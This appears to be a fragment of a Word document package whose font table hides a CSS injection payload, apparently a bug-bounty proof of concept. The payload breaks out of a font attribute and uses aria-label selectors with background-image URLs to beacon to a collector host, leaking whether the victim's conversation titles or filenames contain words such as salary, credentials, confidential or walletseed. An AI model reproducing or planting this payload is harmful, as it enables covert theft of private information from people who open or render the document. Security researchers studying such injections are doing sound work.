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hello</w:t>
      </w:r>
    </w:p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a;}html{background-image:url(https://127.0.0.1:8443/v9/PAYLOAD-FIRED-css-injection-in-app-origin)!important}*[aria-label*=&quot;bugcrowd&quot;i]{--abugcrowd:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/conversation-title/bugcrowd)}*[aria-label*=&quot;money&quot;i]{--amoney:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/conversation-title/money)}*[aria-label*=&quot;football&quot;i]{--afootball:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/conversation-title/football)}*[aria-label*=&quot;weather&quot;i]{--aweather:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/conversation-title/weather)}*[aria-label*=&quot;identity&quot;i]{--aidentity:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/conversation-title/identity)}*[aria-label*=&quot;acquisition&quot;i]{--aacquisition:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/sensitive-filename/acquisition)}*[aria-label*=&quot;salary&quot;i]{--asalary:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/sensitive-filename/salary)}*[aria-label*=&quot;confidential&quot;i]{--aconfidential:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/sensitive-filename/confidential)}*[aria-label*=&quot;credentials&quot;i]{--acredentials:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/sensitive-filename/credentials)}*[aria-label*=&quot;nda&quot;i]{--anda:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/sensitive-filename/nda)}*[aria-label*=&quot;titan&quot;i]{--atitan:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/sensitive-filename/titan)}*[aria-label*=&quot;ransomware&quot;i]{--aransomware:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/decoy/ransomware)}*[aria-label*=&quot;walletseed&quot;i]{--awalletseed:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/decoy/walletseed)}*[aria-label*=&quot;payroll&quot;i]{--apayroll:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/decoy/payroll)}*[aria-label*=&quot;subpoena&quot;i]{--asubpoena:url(https://127.0.0.1:8443/v9/victim-aria-label-contains/decoy/subpoena)}*[aria-label]{background-image:url(https://127.0.0.1:8443/v9/SURFACE-PAINTED/victim-aria-label-contains),var(--abugcrowd,none),var(--amoney,none),var(--afootball,none),var(--aweather,none),var(--aidentity,none),var(--aacquisition,none),var(--asalary,none),var(--aconfidential,none),var(--acredentials,none),var(--anda,none),var(--atitan,none),var(--aransomware,none),var(--awalletseed,none),var(--apayroll,none),var(--asubpoena,none)!important}.bb-noop{color:inherit}">
    <w:embedRegular r:id="rIdF1" w:fontKey="{00000000-0000-0000-0000-000000000000}"/>
  </w:font>
</w:fonts>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdFT" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xm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/Relationships>
</file>